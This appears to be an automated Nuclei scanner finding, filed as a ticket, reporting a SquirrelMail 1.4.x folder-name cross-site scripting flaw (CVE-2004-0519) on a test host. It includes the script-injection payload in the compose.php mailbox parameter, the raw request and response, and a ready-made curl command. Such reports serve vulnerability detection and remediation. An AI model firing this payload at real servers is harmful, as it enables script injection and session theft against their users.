SquirrelMail 1.4.x - Folder Name Cross-Site Scripting (CVE-2004-0519) found on honey.scanme.sh

Details: CVE-2004-0519 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Timestamp: Tue Apr 30 19:26:14 +0530 IST 2024

Template Information

Key	Value
Name	SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
Authors	dhiyaneshdk
Tags	cve, cve2004, squirrelmail, edb, xss, sgi
Severity	medium
Description	Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
Remediation	Upgrade to the latest version.
CVSS-Metrics	CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
CVE-ID	CVE-2004-0519
CVSS-Score	6.80
vendor	sgi
product	propack

Request

GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.1516.6.1 Ddg/16.6.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 344
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:56:14 GMT

GET /mail/src/compose.php?mailbox=</script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.1516.6.1 Ddg/16.6.1

References:

https://www.exploit-db.com/exploits/24068
http://security.gentoo.org/glsa/glsa-200405-16.xml
ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858
http://marc.info/?l=bugtraq&m=108334862800260

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.1516.6.1 Ddg/16.6.1' 'https://honey.scanme.sh/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

Generated by Nuclei v3.2.5

mkrs2404 / tickets

SquirrelMail 1.4.x - Folder Name Cross-Site Scripting (CVE-2004-0519) found on honey.scanme.sh #29